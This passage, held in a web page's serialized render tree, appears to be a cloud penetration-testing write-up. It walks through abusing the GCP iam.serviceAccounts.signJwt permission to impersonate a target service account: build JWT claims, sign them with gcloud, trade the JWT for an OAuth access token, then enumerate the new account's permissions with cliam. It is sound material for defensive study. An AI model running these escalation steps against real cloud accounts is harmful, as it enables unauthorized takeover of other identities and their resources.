privileges.",{"type":33,"tag":40,"props":2291,"children":2293},{"id":2292},"abusing-iamserviceaccountssignjwt",[2294],{"type":38,"value":2295},"Abusing iam.serviceAccounts.signJwt",{"type":33,"tag":47,"props":2297,"children":2298},{},[2299,2301,2310],{"type":38,"value":2300},"The permission ",{"type":33,"tag":2302,"props":2303,"children":2304},"strong",{},[2305],{"type":33,"tag":105,"props":2306,"children":2308},{"className":2307},[],[2309],{"type":38,"value":1361},{"type":38,"value":2311}," in Google Cloud allows a user or service to use a private key associated with a service account to sign a JSON Web Token (JWT).",{"type":33,"tag":47,"props":2313,"children":2314},{},[2315],{"type":38,"value":2316},"There are different use cases:",{"type":33,"tag":239,"props":2318,"children":2319},{},[2320,2330,2340],{"type":33,"tag":243,"props":2321,"children":2322},{},[2323,2328],{"type":33,"tag":2302,"props":2324,"children":2325},{},[2326],{"type":38,"value":2327},"Inter-service Authentication",{"type":38,"value":2329},": A service can generate a signed JWT to authenticate with other services.",{"type":33,"tag":243,"props":2331,"children":2332},{},[2333,2338],{"type":33,"tag":2302,"props":2334,"children":2335},{},[2336],{"type":38,"value":2337},"Temporary Access",{"type":38,"value":2339},": Generation of OAuth2 tokens based on a JWT to access Google APIs.",{"type":33,"tag":243,"props":2341,"children":2342},{},[2343,2348],{"type":33,"tag":2302,"props":2344,"children":2345},{},[2346],{"type":38,"value":2347},"OpenID Connect Authentication",{"type":38,"value":2349},": Used to prove the service account's identity to third-party services.",{"type":33,"tag":47,"props":2351,"children":2352},{},[2353,2355,2360],{"type":38,"value":2354},"What interests us is the second part - it is possible to create an OAuth2 token from a JWT to access the Google API, which will allow us to gain control over the ",{"type":33,"tag":105,"props":2356,"children":2358},{"className":2357},[],[2359],{"type":38,"value":2287},{"type":38,"value":2361}," service account.",{"type":33,"tag":47,"props":2363,"children":2364},{},[2365,2367,2373,2375],{"type":38,"value":2366},"Currently we are the freshly compromised service account thanks to implicit delegation: ",{"type":33,"tag":105,"props":2368,"children":2370},{"className":2369},[],[2371],{"type":38,"value":2372},"analytics@gr-proj-4.iam.gserviceaccount.com",{"type":38,"value":2374},", and our target will be the service account ",{"type":33,"tag":105,"props":2376,"children":2378},{"className":2377},[],[2379],{"type":38,"value":2380},"platform-middleware@gr-proj-4.iam.gserviceaccount.com",{"type":33,"tag":47,"props":2382,"children":2383},{},[2384],{"type":38,"value":2385},"First, we need to create our data part of our JWT like this:",{"type":33,"tag":114,"props":2387,"children":2388},{"lang":116},[2389],{"type":33,"tag":119,"props":2390,"children":2392},{"className":121,"code":2391,"language":116,"meta":8,"style":8},"export IAT=$(date +%s)\nexport EXP=$(($IAT + 3600))\ncat > claims.json \u003C\u003CEOF\n{\n\"iss\": \"platform-middleware@gr-proj-4.iam.gserviceaccount.com\",\n\"scope\": \"https://www.googleapis.com/auth/cloud-platform\",\n\"aud\": \"https://oauth2.googleapis.com/token\",\n\"exp\": $EXP,\n\"iat\": $IAT\n}\nEOF\n",[2393],{"type":33,"tag":105,"props":2394,"children":2395},{"__ignoreMap":8},[2396,2428,2460,2488,2495,2503,2511,2519,2527,2535,2542],{"type":33,"tag":128,"props":2397,"children":2398},{"class":130,"line":131},[2399,2403,2408,2413,2418,2423],{"type":33,"tag":128,"props":2400,"children":2401},{"style":300},[2402],{"type":38,"value":303},{"type":33,"tag":128,"props":2404,"children":2405},{"style":306},[2406],{"type":38,"value":2407}," IAT",{"type":33,"tag":128,"props":2409,"children":2410},{"style":312},[2411],{"type":38,"value":2412},"=$(",{"type":33,"tag":128,"props":2414,"children":2415},{"style":135},[2416],{"type":38,"value":2417},"date",{"type":33,"tag":128,"props":2419,"children":2420},{"style":140},[2421],{"type":38,"value":2422}," +%s",{"type":33,"tag":128,"props":2424,"children":2425},{"style":312},[2426],{"type":38,"value":2427},")\n",{"type":33,"tag":128,"props":2429,"children":2430},{"class":130,"line":362},[2431,2435,2440,2445,2450,2455],{"type":33,"tag":128,"props":2432,"children":2433},{"style":300},[2434],{"type":38,"value":303},{"type":33,"tag":128,"props":2436,"children":2437},{"style":306},[2438],{"type":38,"value":2439}," EXP",{"type":33,"tag":128,"props":2441,"children":2442},{"style":312},[2443],{"type":38,"value":2444},"=$((",{"type":33,"tag":128,"props":2446,"children":2447},{"style":306},[2448],{"type":38,"value":2449},"$IAT",{"type":33,"tag":128,"props":2451,"children":2452},{"style":323},[2453],{"type":38,"value":2454}," + 3600",{"type":33,"tag":128,"props":2456,"children":2457},{"style":312},[2458],{"type":38,"value":2459},"))\n",{"type":33,"tag":128,"props":2461,"children":2462},{"class":130,"line":403},[2463,2468,2473,2478,2483],{"type":33,"tag":128,"props":2464,"children":2465},{"style":135},[2466],{"type":38,"value":2467},"cat",{"type":33,"tag":128,"props":2469,"children":2470},{"style":300},[2471],{"type":38,"value":2472}," >",{"type":33,"tag":128,"props":2474,"children":2475},{"style":140},[2476],{"type":38,"value":2477}," claims.json",{"type":33,"tag":128,"props":2479,"children":2480},{"style":300},[2481],{"type":38,"value":2482}," \u003C\u003C",{"type":33,"tag":128,"props":2484,"children":2485},{"style":676},[2486],{"type":38,"value":2487},"EOF\n",{"type":33,"tag":128,"props":2489,"children":2490},{"class":130,"line":739},[2491],{"type":33,"tag":128,"props":2492,"children":2493},{"style":140},[2494],{"type":38,"value":650},{"type":33,"tag":128,"props":2496,"children":2497},{"class":130,"line":765},[2498],{"type":33,"tag":128,"props":2499,"children":2500},{"style":140},[2501],{"type":38,"value":2502},"\"iss\": \"platform-middleware@gr-proj-4.iam.gserviceaccount.com\",\n",{"type":33,"tag":128,"props":2504,"children":2505},{"class":130,"line":804},[2506],{"type":33,"tag":128,"props":2507,"children":2508},{"style":140},[2509],{"type":38,"value":2510},"\"scope\": \"https://www.googleapis.com/auth/cloud-platform\",\n",{"type":33,"tag":128,"props":2512,"children":2513},{"class":130,"line":839},[2514],{"type":33,"tag":128,"props":2515,"children":2516},{"style":140},[2517],{"type":38,"value":2518},"\"aud\": \"https://oauth2.googleapis.com/token\",\n",{"type":33,"tag":128,"props":2520,"children":2521},{"class":130,"line":848},[2522],{"type":33,"tag":128,"props":2523,"children":2524},{"style":140},[2525],{"type":38,"value":2526},"\"exp\": $EXP,\n",{"type":33,"tag":128,"props":2528,"children":2529},{"class":130,"line":976},[2530],{"type":33,"tag":128,"props":2531,"children":2532},{"style":140},[2533],{"type":38,"value":2534},"\"iat\": $IAT\n",{"type":33,"tag":128,"props":2536,"children":2537},{"class":130,"line":988},[2538],{"type":33,"tag":128,"props":2539,"children":2540},{"style":140},[2541],{"type":38,"value":854},{"type":33,"tag":128,"props":2543,"children":2544},{"class":130,"line":1001},[2545],{"type":33,"tag":128,"props":2546,"children":2547},{"style":676},[2548],{"type":38,"value":2487},{"type":33,"tag":47,"props":2550,"children":2551},{},[2552],{"type":38,"value":2553},"Here are the details of the JWT payload section:",{"type":33,"tag":239,"props":2555,"children":2556},{},[2557,2585,2610,2642,2656],{"type":33,"tag":243,"props":2558,"children":2559},{},[2560,2569,2571,2577],{"type":33,"tag":2302,"props":2561,"children":2562},{},[2563],{"type":33,"tag":105,"props":2564,"children":2566},{"className":2565},[],[2567],{"type":38,"value":2568},"iss",{"type":38,"value":2570}," – ",{"type":33,"tag":2572,"props":2573,"children":2574},"em",{},[2575],{"type":38,"value":2576},"Issuer",{"type":33,"tag":239,"props":2578,"children":2579},{},[2580],{"type":33,"tag":243,"props":2581,"children":2582},{},[2583],{"type":38,"value":2584},"The service account email address. This indicates who generated the JWT",{"type":33,"tag":243,"props":2586,"children":2587},{},[2588,2596,2597,2602],{"type":33,"tag":2302,"props":2589,"children":2590},{},[2591],{"type":33,"tag":105,"props":2592,"children":2594},{"className":2593},[],[2595],{"type":38,"value":1974},{"type":38,"value":2570},{"type":33,"tag":2572,"props":2598,"children":2599},{},[2600],{"type":38,"value":2601},"Access Scope",{"type":33,"tag":239,"props":2603,"children":2604},{},[2605],{"type":33,"tag":243,"props":2606,"children":2607},{},[2608],{"type":38,"value":2609},"One or more URLs indicating the requested permissions, used to specify which services or APIs in Google Cloud we want to use",{"type":33,"tag":243,"props":2611,"children":2612},{},[2613,2622,2623,2628],{"type":33,"tag":2302,"props":2614,"children":2615},{},[2616],{"type":33,"tag":105,"props":2617,"children":2619},{"className":2618},[],[2620],{"type":38,"value":2621},"aud",{"type":38,"value":2570},{"type":33,"tag":2572,"props":2624,"children":2625},{},[2626],{"type":38,"value":2627},"Audience",{"type":33,"tag":239,"props":2629,"children":2630},{},[2631],{"type":33,"tag":243,"props":2632,"children":2633},{},[2634,2636],{"type":38,"value":2635},"Google's OAuth2 endpoint URL, which specifies the intended recipient service of the JWT, in this case Google OAuth to obtain an ",{"type":33,"tag":105,"props":2637,"children":2639},{"className":2638},[],[2640],{"type":38,"value":2641},"access_token",{"type":33,"tag":243,"props":2643,"children":2644},{},[2645,2654],{"type":33,"tag":2302,"props":2646,"children":2647},{},[2648],{"type":33,"tag":105,"props":2649,"children":2651},{"className":2650},[],[2652],{"type":38,"value":2653},"exp",{"type":38,"value":2655}," – Expiration Time",{"type":33,"tag":243,"props":2657,"children":2658},{},[2659,2668],{"type":33,"tag":2302,"props":2660,"children":2661},{},[2662],{"type":33,"tag":105,"props":2663,"children":2665},{"className":2664},[],[2666],{"type":38,"value":2667},"iat",{"type":38,"value":2669}," – Issued At Time",{"type":33,"tag":47,"props":2671,"children":2672},{},[2673],{"type":38,"value":2674},"Then we will sign our JWT using the target service account:",{"type":33,"tag":114,"props":2676,"children":2677},{"lang":116},[2678],{"type":33,"tag":119,"props":2679,"children":2681},{"className":121,"code":2680,"language":116,"meta":8,"style":8},"gcloud iam service-accounts sign-jwt claims.json signed-jwt.txt \\\n --iam-account=platform-middleware@gr-proj-4.iam.gserviceaccount.com\n",[2682],{"type":33,"tag":105,"props":2683,"children":2684},{"__ignoreMap":8},[2685,2721],{"type":33,"tag":128,"props":2686,"children":2687},{"class":130,"line":131},[2688,2692,2697,2702,2707,2711,2716],{"type":33,"tag":128,"props":2689,"children":2690},{"style":135},[2691],{"type":38,"value":110},{"type":33,"tag":128,"props":2693,"children":2694},{"style":140},[2695],{"type":38,"value":2696}," iam",{"type":33,"tag":128,"props":2698,"children":2699},{"style":140},[2700],{"type":38,"value":2701}," service-accounts",{"type":33,"tag":128,"props":2703,"children":2704},{"style":140},[2705],{"type":38,"value":2706}," sign-jwt",{"type":33,"tag":128,"props":2708,"children":2709},{"style":140},[2710],{"type":38,"value":2477},{"type":33,"tag":128,"props":2712,"children":2713},{"style":140},[2714],{"type":38,"value":2715}," signed-jwt.txt",{"type":33,"tag":128,"props":2717,"children":2718},{"style":151},[2719],{"type":38,"value":2720}," \\\n",{"type":33,"tag":128,"props":2722,"children":2723},{"class":130,"line":362},[2724],{"type":33,"tag":128,"props":2725,"children":2726},{"style":151},[2727],{"type":38,"value":2728}," --iam-account=platform-middleware@gr-proj-4.iam.gserviceaccount.com\n",{"type":33,"tag":47,"props":2730,"children":2731},{},[2732,2734,2739,2741,2746,2748,2753],{"type":38,"value":2733},"This command is launched from a service account ",{"type":33,"tag":105,"props":2735,"children":2737},{"className":2736},[],[2738],{"type":38,"value":2254},{"type":38,"value":2740},", which has been authorized via IAM to perform the action ",{"type":33,"tag":105,"props":2742,"children":2744},{"className":2743},[],[2745],{"type":38,"value":1361},{"type":38,"value":2747}," on the service account ",{"type":33,"tag":105,"props":2749,"children":2751},{"className":2750},[],[2752],{"type":38,"value":2287},{"type":38,"value":215},{"type":33,"tag":47,"props":2755,"children":2756},{},[2757],{"type":38,"value":2758},"This means that:",{"type":33,"tag":239,"props":2760,"children":2761},{},[2762,2780],{"type":33,"tag":243,"props":2763,"children":2764},{},[2765,2767,2772,2774,2779],{"type":38,"value":2766},"The ",{"type":33,"tag":105,"props":2768,"children":2770},{"className":2769},[],[2771],{"type":38,"value":2254},{"type":38,"value":2773}," account does not have the private key of ",{"type":33,"tag":105,"props":2775,"children":2777},{"className":2776},[],[2778],{"type":38,"value":2287},{"type":38,"value":215},{"type":33,"tag":243,"props":2781,"children":2782},{},[2783,2785,2790],{"type":38,"value":2784},"But it has the right to ask Google IAM to sign a JWT on its behalf, as if ",{"type":33,"tag":105,"props":2786,"children":2788},{"className":2787},[],[2789],{"type":38,"value":2287},{"type":38,"value":2791}," was doing it.",{"type":33,"tag":47,"props":2793,"children":2794},{},[2795],{"type":38,"value":2796},"To explain the command parameters in more detail:",{"type":33,"tag":239,"props":2798,"children":2799},{},[2800,2818,2835],{"type":33,"tag":243,"props":2801,"children":2802},{},[2803,2809,2811,2816],{"type":33,"tag":105,"props":2804,"children":2806},{"className":2805},[],[2807],{"type":38,"value":2808},"claims.json",{"type":38,"value":2810},"→ Input file containing the ",{"type":33,"tag":2302,"props":2812,"children":2813},{},[2814],{"type":38,"value":2815},"data",{"type":38,"value":2817}," of the JWT to be signed (JSON format).",{"type":33,"tag":243,"props":2819,"children":2820},{},[2821,2827,2829,2834],{"type":33,"tag":105,"props":2822,"children":2824},{"className":2823},[],[2825],{"type":38,"value":2826},"signed-jwt.txt",{"type":38,"value":2828},"→ Output file that will contain the ",{"type":33,"tag":2302,"props":2830,"children":2831},{},[2832],{"type":38,"value":2833},"signed JWT",{"type":38,"value":215},{"type":33,"tag":243,"props":2836,"children":2837},{},[2838,2844,2846,2851,2853,2858],{"type":33,"tag":105,"props":2839,"children":2841},{"className":2840},[],[2842],{"type":38,"value":2843},"--iam-account=platform-middleware@gr-proj-4.iam.gserviceaccount.com",{"type":38,"value":2845},"→ Indicates that ",{"type":33,"tag":2302,"props":2847,"children":2848},{},[2849],{"type":38,"value":2850},"this service account",{"type":38,"value":2852}," (",{"type":33,"tag":105,"props":2854,"children":2856},{"className":2855},[],[2857],{"type":38,"value":2287},{"type":38,"value":2859},") should sign the JWT.",{"type":33,"tag":47,"props":2861,"children":2862},{},[2863],{"type":38,"value":2864},"Then we will be able to use this JWT to claim an access token that will allow us to gain access to the target service account.",{"type":33,"tag":114,"props":2866,"children":2867},{"lang":116},[2868],{"type":33,"tag":119,"props":2869,"children":2871},{"className":121,"code":2870,"language":116,"meta":8,"style":8},"curl -s -X POST https://oauth2.googleapis.com/token \\\n-H \"Content-Type: application/x-www-form-urlencoded\" \\\n-d \"grant_type=urn:ietf:params:oauth:grant-type:jwt-bearer&assertion=$(cat signed-jwt.txt)\" \\\n| jq -r .access_token\nya29.c.c0ASRK0Gbjv4[...SNIP...]irRX3JRyQrz1rS3xqVc8\n",[2872],{"type":33,"tag":105,"props":2873,"children":2874},{"__ignoreMap":8},[2875,2907,2932,2975,2998],{"type":33,"tag":128,"props":2876,"children":2877},{"class":130,"line":131},[2878,2883,2888,2893,2898,2903],{"type":33,"tag":128,"props":2879,"children":2880},{"style":135},[2881],{"type":38,"value":2882},"curl",{"type":33,"tag":128,"props":2884,"children":2885},{"style":151},[2886],{"type":38,"value":2887}," -s",{"type":33,"tag":128,"props":2889,"children":2890},{"style":151},[2891],{"type":38,"value":2892}," -X",{"type":33,"tag":128,"props":2894,"children":2895},{"style":140},[2896],{"type":38,"value":2897}," POST",{"type":33,"tag":128,"props":2899,"children":2900},{"style":140},[2901],{"type":38,"value":2902}," https://oauth2.googleapis.com/token",{"type":33,"tag":128,"props":2904,"children":2905},{"style":151},[2906],{"type":38,"value":2720},{"type":33,"tag":128,"props":2908,"children":2909},{"class":130,"line":362},[2910,2915,2919,2924,2928],{"type":33,"tag":128,"props":2911,"children":2912},{"style":323},[2913],{"type":38,"value":2914},"-H ",{"type":33,"tag":128,"props":2916,"children":2917},{"style":676},[2918],{"type":38,"value":669},{"type":33,"tag":128,"props":2920,"children":2921},{"style":140},[2922],{"type":38,"value":2923},"Content-Type: application/x-www-form-urlencoded",{"type":33,"tag":128,"props":2925,"children":2926},{"style":676},[2927],{"type":38,"value":669},{"type":33,"tag":128,"props":2929,"children":2930},{"style":151},[2931],{"type":38,"value":2720},{"type":33,"tag":128,"props":2933,"children":2934},{"class":130,"line":403},[2935,2940,2944,2949,2954,2958,2962,2967,2971],{"type":33,"tag":128,"props":2936,"children":2937},{"style":323},[2938],{"type":38,"value":2939},"-d ",{"type":33,"tag":128,"props":2941,"children":2942},{"style":676},[2943],{"type":38,"value":669},{"type":33,"tag":128,"props":2945,"children":2946},{"style":140},[2947],{"type":38,"value":2948},"grant_type=urn:ietf:params:oauth:grant-type:jwt-bearer&assertion=",{"type":33,"tag":128,"props":2950,"children":2951},{"style":312},[2952],{"type":38,"value":2953},"$(",{"type":33,"tag":128,"props":2955,"children":2956},{"style":135},[2957],{"type":38,"value":2467},{"type":33,"tag":128,"props":2959,"children":2960},{"style":140},[2961],{"type":38,"value":2715},{"type":33,"tag":128,"props":2963,"children":2964},{"style":312},[2965],{"type":38,"value":2966},")",{"type":33,"tag":128,"props":2968,"children":2969},{"style":676},[2970],{"type":38,"value":669},{"type":33,"tag":128,"props":2972,"children":2973},{"style":151},[2974],{"type":38,"value":2720},{"type":33,"tag":128,"props":2976,"children":2977},{"class":130,"line":739},[2978,2983,2988,2993],{"type":33,"tag":128,"props":2979,"children":2980},{"style":300},[2981],{"type":38,"value":2982},"|",{"type":33,"tag":128,"props":2984,"children":2985},{"style":135},[2986],{"type":38,"value":2987}," jq",{"type":33,"tag":128,"props":2989,"children":2990},{"style":151},[2991],{"type":38,"value":2992}," -r",{"type":33,"tag":128,"props":2994,"children":2995},{"style":140},[2996],{"type":38,"value":2997}," .access_token\n",{"type":33,"tag":128,"props":2999,"children":3000},{"class":130,"line":765},[3001],{"type":33,"tag":128,"props":3002,"children":3003},{"style":135},[3004],{"type":38,"value":3005},"ya29.c.c0ASRK0Gbjv4[...SNIP...]irRX3JRyQrz1rS3xqVc8\n",{"type":33,"tag":47,"props":3007,"children":3008},{},[3009,3011,3016],{"type":38,"value":3010},"We can use the retrieved access token and begin enumerating the newly compromised service account (",{"type":33,"tag":105,"props":3012,"children":3014},{"className":3013},[],[3015],{"type":38,"value":2380},{"type":38,"value":3017},") with cliam:",{"type":33,"tag":114,"props":3019,"children":3020},{"lang":116},[3021],{"type":33,"tag":119,"props":3022,"children":3024},{"className":121,"code":3023,"language":116,"meta":8,"style":8},"cliam gcp --access-token=\"$CLOUDSDK_AUTH_ACCESS_TOKEN\" --project-id gr-proj-4 bruteforce\nApr 04 00:38:49 DBG ● project=gr-proj-4 region=us-central1 zone=us-central1-a\nApr 04 00:38:54 INF ● compute.acceleratorTypes=get\nApr 04 00:38:54 INF ● compute.acceleratorTypes=list\nApr 04 00:38:54 INF ● compute.addresses=get\nApr 04 00:38:54 INF ● compute.addresses=list\nApr 04 00:38:54 INF ● compute.autoscalers=get\n[...SNIP...]\nApr 04 00:38:54 INF ● compute.zoneOperations=get\nApr 04 00:38:54 INF ● compute.zoneOperations=get-iam-policy\nApr 04 00:38:54 INF ● compute.zoneOperations=list\nApr 04 00:38:54 INF ● compute.zones=get\nApr 04 00:38:54 INF ● compute.zones=list\nApr 04 00:38:56 INF ● resourcemanager.projects=get\nApr 04 00:38:56 INF ● secretmanager.secrets=get\nApr 04 00:38:56 INF ● secretmanager.secrets=get-iam-policy\nApr 04 00:38:56 INF ● secretmanager.secrets=list\nApr 04 00:38:57 INF ● run.routes=invoke\nApr 04 00:38:57 INF ● serviceusage.quotas=get\nApr 04 00:38:57 INF ● serviceusage.services=get\nApr 04 00:38:57 INF ● serviceusage.services=list\n",[3025],{"type":33,"tag":105,"props":3026,"children":3027},{"__ignoreMap":8},[3028,3070,3106,3135,3163,3191,3219,3247,3263,3291,3319,3347,3375,3403,3432,3460,3488,3516,3545,3573,3601],{"type":33,"tag":128,"props":3029,"children":3030},{"class":130,"line":131},[3031,3035,3039,3044,3048,3053,3057,3062,3066],{"type":33,"tag":128,"props":3032,"children":3033},{"style":135},[3034],{"type":38,"value":468},{"type":33,"tag":128,"props":3036,"children":3037},{"style":140},[3038],{"type":38,"value":492},{"type":33,"tag":128,"props":3040,"children":3041},{"style":151},[3042],{"type":38,"value":3043}," --access-token=",{"type":33,"tag":128,"props":3045,"children":3046},{"style":676},[3047],{"type":38,"value":669},{"type":33,"tag":128,"props":3049,"children":3050},{"style":140},[3051],{"type":38,"value":3052},"$CLOUDSDK_AUTH_ACCESS_TOKEN",{"type":33,"tag":128,"props":3054,"children":3055},{"style":676},[3056],{"type":38,"value":669},{"type":33,"tag":128,"props":3058,"children":3059},{"style":151},[3060],{"type":38,"value":3061}," --project-id",{"type":33,"tag":128,"props":3063,"children":3064},{"style":140},[3065],{"type":38,"value":507},{"type":33,"tag":128,"props":3067,"children":3068},{"style":140},[3069],{"type":38,"value":512},{"type":33,"tag":128,"props":3071,"children":3072},{"class":130,"line":362},[3073,3077,3081,3086,3090,3094,3098,3102],{"type":33,"tag":128,"props":3074,"children":3075},{"style":135},[3076],{"type":38,"value":520},{"type":33,"tag":128,"props":3078,"children":3079},{"style":523},[3080],{"type":38,"value":526},{"type":33,"tag":128,"props":3082,"children":3083},{"style":140},[3084],{"type":38,"value":3085}," 00:38:49",{"type":33,"tag":128,"props":3087,"children":3088},{"style":140},[3089],{"type":38,"value":536},{"type":33,"tag":128,"props":3091,"children":3092},{"style":140},[3093],{"type":38,"value":541},{"type":33,"tag":128,"props":3095,"children":3096},{"style":140},[3097],{"type":38,"value":546},{"type":33,"tag":128,"props":3099,"children":3100},{"style":140},[3101],{"type":38,"value":551},{"type":33,"tag":128,"props":3103,"children":3104},{"style":140},[3105],{"type":38,"value":556},{"type":33,"tag":128,"props":3107,"children":3108},{"class":130,"line":403},[3109,3113,3117,3122,3126,3130],{"type":33,"tag":128,"props":3110,"children":3111},{"style":135},[3112],{"type":38,"value":520},{"type":33,"tag":128,"props":3114,"children":3115},{"style":523},[3116],{"type":38,"value":526},{"type":33,"tag":128,"props":3118,"children":3119},{"style":140},[3120],{"type":38,"value":3121}," 00:38:54",{"type":33,"tag":128,"props":3123,"children":3124},{"style":140},[3125],{"type":38,"value":577},{"type":33,"tag":128,"props":3127,"children":3128},{"style":140},[3129],{"type":38,"value":541},{"type":33,"tag":128,"props":3131,"children":3132},{"style":140},[3133],{"type":38,"value":3134}," compute.acceleratorTypes=get\n",{"type":33,"tag":128,"props":3136,"children":3137},{"class":130,"line":739},[3138,3142,3146,3150,3154,3158],{"type":33,"tag":128,"props":3139,"children":3140},{"style":135},[3141],{"type":38,"value":520},{"type":33,"tag":128,"props":3143,"children":3144},{"style":523},[3145],{"type":38,"value":526},{"type":33,"tag":128,"props":3147,"children":3148},{"style":140},[3149],{"type":38,"value":3121},{"type":33,"tag":128,"props":3151,"children":3152},{"style":140},[3153],{"type":38,"value":577},{"type":33,"tag":128,"props":3155,"children":3156},{"style":140},[3157],{"type":38,"value":541},{"type":33,"tag":128,"props":3159,"children":3160},{"style":140},[3161],{"type":38,"value":3162}," compute.acceleratorTypes=list\n",{"type":33,"tag":128,"props":3164,"children":3165},{"class":130,"line":765},[3166,3170,3174,3178,3182,3186],{"type":33,"tag":128,"props":3167,"children":3168},{"style":135},[3169],{"type":38,"value":520},{"type":33,"tag":128,"props":3171,"children":3172},{"style":523},[3173],{"type":38,"value":526},{"type":33,"tag":128,"props":3175,"children":3176},{"style":140},[3177],{"type":38,"value":3121},{"type":33,"tag":128,"props":3179,"children":3180},{"style":140},[3181],{"type":38,"value":577},{"type":33,"tag":128,"props":3183,"children":3184},{"style":140},[3185],{"type":38,"value":541},{"type":33,"tag":128,"props":3187,"children":3188},{"style":140},[3189],{"type":38,"value":3190}," compute.addresses=get\n",{"type":33,"tag":128,"props":3192,"children":3193},{"class":130,"line":804},[3194,3198,3202,3206,3210,3214],{"type":33,"tag":128,"props":3195,"children":3196},{"style":135},[3197],{"type":38,"value":520},{"type":33,"tag":128,"props":3199,"children":3200},{"style":523},[3201],{"type":38,"value":526},{"type":33,"tag":128,"props":3203,"children":3204},{"style":140},[3205],{"type":38,"value":3121},{"type":33,"tag":128,"props":3207,"children":3208},{"style":140},[3209],{"type":38,"value":577},{"type":33,"tag":128,"props":3211,"children":3212},{"style":140},[3213],{"type":38,"value":541},{"type":33,"tag":128,"props":3215,"children":3216},{"style":140},[3217],{"type":38,"value":3218}," compute.addresses=list\n",{"type":33,"tag":128,"props":3220,"children":3221},{"class":130,"line":839},[3222,3226,3230,3234,3238,3242],{"type":33,"tag":128,"props":3223,"children":3224},{"style":135},[3225],{"type":38,"value":520},{"type":33,"tag":128,"props":3227,"children":3228},{"style":523},[3229],{"type":38,"value":526},{"type":33,"tag":128,"props":3231,"children":3232},{"style":140},[3233],{"type":38,"value":3121},{"type":33,"tag":128,"props":3235,"children":3236},{"style":140},[3237],{"type":38,"value":577},{"type":33,"tag":128,"props":3239,"children":3240},{"style":140},[3241],{"type":38,"value":541},{"type":33,"tag":128,"props":3243,"children":3244},{"style":140},[3245],{"type":38,"value":3246}," compute.autoscalers=get\n",{"type":33,"tag":128,"props":3248,"children":3249},{"class":130,"line":848},[3250,3254,3258],{"type":33,"tag":128,"props":3251,"children":3252},{"style":312},[3253],{"type":38,"value":344},{"type":33,"tag":128,"props":3255,"children":3256},{"style":323},[3257],{"type":38,"value":349},{"type":33,"tag":128,"props":3259,"children":3260},{"style":312},[3261],{"type":38,"value":3262},"]\n",{"type":33,"tag":128,"props":3264,"children":3265},{"class":130,"line":976},[3266,3270,3274,3278,3282,3286],{"type":33,"tag":128,"props":3267,"children":3268},{"style":135},[3269],{"type":38,"value":520},{"type":33,"tag":128,"props":3271,"children":3272},{"style":523},[3273],{"type":38,"value":526},{"type":33,"tag":128,"props":3275,"children":3276},{"style":140},[3277],{"type":38,"value":3121},{"type":33,"tag":128,"props":3279,"children":3280},{"style":140},[3281],{"type":38,"value":577},{"type":33,"tag":128,"props":3283,"children":3284},{"style":140},[3285],{"type":38,"value":541},{"type":33,"tag":128,"props":3287,"children":3288},{"style":140},[3289],{"type":38,"value":3290}," compute.zoneOperations=get\n",{"type":33,"tag":128,"props":3292,"children":3293},{"class":130,"line":988},[3294,3298,3302,3306,3310,3314],{"type":33,"tag":128,"props":3295,"children":3296},{"style":135},[3297],{"type":38,"value":520},{"type":33,"tag":128,"props":3299,"children":3300},{"style":523},[3301],{"type":38,"value":526},{"type":33,"tag":128,"props":3303,"children":3304},{"style":140},[3305],{"type":38,"value":3121},{"type":33,"tag":128,"props":3307,"children":3308},{"style":140},[3309],{"type":38,"value":577},{"type":33,"tag":128,"props":3311,"children":3312},{"style":140},[3313],{"type":38,"value":541},{"type":33,"tag":128,"props":3315,"children":3316},{"style":140},[3317],{"type":38,"value":3318}," compute.zoneOperations=get-iam-policy\n",{"type":33,"tag":128,"props":3320,"children":3321},{"class":130,"line":1001},[3322,3326,3330,3334,3338,3342],{"type":33,"tag":128,"props":3323,"children":3324},{"style":135},[3325],{"type":38,"value":520},{"type":33,"tag":128,"props":3327,"children":3328},{"style":523},[3329],{"type":38,"value":526},{"type":33,"tag":128,"props":3331,"children":3332},{"style":140},[3333],{"type":38,"value":3121},{"type":33,"tag":128,"props":3335,"children":3336},{"style":140},[3337],{"type":38,"value":577},{"type":33,"tag":128,"props":3339,"children":3340},{"style":140},[3341],{"type":38,"value":541},{"type":33,"tag":128,"props":3343,"children":3344},{"style":140},[3345],{"type":38,"value":3346}," compute.zoneOperations=list\n",{"type":33,"tag":128,"props":3348,"children":3349},{"class":130,"line":1014},[3350,3354,3358,3362,3366,3370],{"type":33,"tag":128,"props":3351,"children":3352},{"style":135},[3353],{"type":38,"value":520},{"type":33,"tag":128,"props":3355,"children":3356},{"style":523},[3357],{"type":38,"value":526},{"type":33,"tag":128,"props":3359,"children":3360},{"style":140},[3361],{"type":38,"value":3121},{"type":33,"tag":128,"props":3363,"children":3364},{"style":140},[3365],{"type":38,"value":577},{"type":33,"tag":128,"props":3367,"children":3368},{"style":140},[3369],{"type":38,"value":541},{"type":33,"tag":128,"props":3371,"children":3372},{"style":140},[3373],{"type":38,"value":3374}," compute.zones=get\n",{"type":33,"tag":128,"props":3376,"children":3377},{"class":130,"line":1026},[3378,3382,3386,3390,3394,3398],{"type":33,"tag":128,"props":3379,"children":3380},{"style":135},[3381],{"type":38,"value":520},{"type":33,"tag":128,"props":3383,"children":3384},{"style":523},[3385],{"type":38,"value":526},{"type":33,"tag":128,"props":3387,"children":3388},{"style":140},[3389],{"type":38,"value":3121},{"type":33,"tag":128,"props":3391,"children":3392},{"style":140},[3393],{"type":38,"value":577},{"type":33,"tag":128,"props":3395,"children":3396},{"style":140},[3397],{"type":38,"value":541},{"type":33,"tag":128,"props":3399,"children":3400},{"style":140},[3401],{"type":38,"value":3402}," compute.zones=list\n",{"type":33,"tag":128,"props":3404,"children":3405},{"class":130,"line":1038},[3406,3410,3414,3419,3423,3427],{"type":33,"tag":128,"props":3407,"children":3408},{"style":135},[3409],{"type":38,"value":520},{"type":33,"tag":128,"props":3411,"children":3412},{"style":523},[3413],{"type":38,"value":526},{"type":33,"tag":128,"props":3415,"children":3416},{"style":140},[3417],{"type":38,"value":3418}," 00:38:56",{"type":33,"tag":128,"props":3420,"children":3421},{"style":140},[3422],{"type":38,"value":577},{"type":33,"tag":128,"props":3424,"children":3425},{"style":140},[3426],{"type":38,"value":541},{"type":33,"tag":128,"props":3428,"children":3429},{"style":140},[3430],{"type":38,"value":3431}," 